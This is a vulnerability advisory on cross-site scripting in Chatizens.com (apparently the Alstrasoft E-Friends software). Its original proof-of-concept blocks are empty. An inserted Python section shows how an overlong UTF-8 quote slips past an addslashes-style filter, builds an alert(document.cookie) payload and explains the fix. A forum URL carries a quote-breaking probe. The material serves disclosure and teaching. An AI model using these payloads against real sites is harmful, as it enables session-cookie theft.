Chatizens.com (also known as Chattown.com)

Homepage:
http://www.chatizens.com

Affected files:

* Profile input boxes:

All input boxes of your profile.

* Browsing the forums
--------------------------------------------

XSS vuln with cookie disclosure via profile input boxes.

To bypass Chatizens' filter, which adds backslashes before ' and ", we use the overlong UTF-8 encoding of '. The filter only escapes the literal single-byte ', so a multi-byte sequence that later decodes to the same character passes through untouched. PoC:



And to display our cookie:



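The bypass described above, as an added example that is not part of the original advisory: the addslashes()-style filter, the overlong encoder, the lenient decoder and the payload below are my own models of the behaviour the text describes, not Chatizens' or Alstrasoft E-Friends' actual code. The point it shows is why the order "escape raw bytes, decode later" loses: the filter never sees a 0x27 byte, yet the page ends up with a quote.

```python
# Added example (not from the advisory): models an addslashes()-style filter
# being bypassed with an overlong UTF-8 encoding of the single quote.
# The filter, decoder and payload are assumptions for illustration, not
# Chatizens' or Alstrasoft E-Friends' real code.

def addslashes(data: bytes) -> bytes:
    """Approximation of PHP's addslashes(): prefix ' " \\ and NUL with a
    backslash. It works on raw bytes, so it only recognises the literal
    0x27 (') and 0x22 (") bytes."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # backslash
        out.append(b)
    return bytes(out)


def overlong_utf8(ch: str, nbytes: int) -> bytes:
    """Encode one code point in a deliberately overlong UTF-8 form using
    nbytes bytes (2..4). For "'" with nbytes=2 this yields C0 A7, which a
    conforming decoder must reject but a lenient one maps back to 0x27."""
    if not 2 <= nbytes <= 4:
        raise ValueError("nbytes must be 2, 3 or 4")
    cp = ord(ch)
    lead_marker = {2: 0xC0, 3: 0xE0, 4: 0xF0}[nbytes]
    continuation = []
    for _ in range(nbytes - 1):
        continuation.append(0x80 | (cp & 0x3F))
        cp >>= 6
    return bytes([lead_marker | cp] + continuation[::-1])


def lenient_utf8_decode(data: bytes) -> str:
    """UTF-8 decoder that ACCEPTS overlong sequences: the defect that turns
    C0 A7 back into a quote. Python's bytes.decode('utf-8') rejects them."""
    out = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if b & 0xE0 == 0xC0:
            need, cp = 1, b & 0x1F
        elif b & 0xF0 == 0xE0:
            need, cp = 2, b & 0x0F
        elif b & 0xF8 == 0xF0:
            need, cp = 3, b & 0x07
        else:
            out.append("\ufffd")
            i += 1
            continue
        tail = data[i + 1:i + 1 + need]
        if len(tail) != need or any(c & 0xC0 != 0x80 for c in tail):
            out.append("\ufffd")
            i += 1
            continue
        for c in tail:
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + need
    return "".join(out)


# Constructed payload: the quote that breaks out of the attribute is sent
# as the overlong form C0 A7 instead of the literal byte 0x27.
PAYLOAD = overlong_utf8("'", 2) + b"><svg onload=alert(document.cookie)>"


def vulnerable(raw: bytes) -> str:
    """Vulnerable order of operations: escape the raw bytes first, decode
    (leniently) afterwards. The overlong quote sails past addslashes()."""
    return lenient_utf8_decode(addslashes(raw))


def hardened(raw: bytes):
    """Hardened order: strictly decode first (overlong forms are rejected),
    then escape the decoded text. Returns None when the input is rejected."""
    try:
        text = raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return None
    return addslashes(text.encode("utf-8")).decode("utf-8")


if __name__ == "__main__":
    print("overlong quote bytes:", overlong_utf8("'", 2).hex())
    print("vulnerable path     :", vulnerable(PAYLOAD))
    print("literal quote path  :", vulnerable(b"'" + PAYLOAD[2:]))
    print("hardened path       :", hardened(PAYLOAD))
```

Running it shows the literal-quote payload coming out as \'><svg ...> (escaped, harmless in a quoted attribute) while the overlong payload comes out as '><svg ...> with the quote intact. The fix is not a better blacklist: decode input strictly into characters once, at the boundary, reject anything a conforming decoder refuses, and only then apply output encoding for the context the value lands in.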
Screenshot:
http://www.youfucktard.com/xsp/chatizen1.jpg
http://www.youfucktard.com/xsp/chatizen2.jpg

---------------------------------------------
heh, it seems chatizens.com is using a webapp I audited before, Alstrasoft E-Friends.

Screenshot:
http://www.youfucktard.com/xsp/chatizen3.jpg

-------------------------------------------

XSS vuln via viewing forum categories:

http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19">">'><""><'<"

Screenshot:
http://www.youfucktard.com/xsp/chatizen4.jpg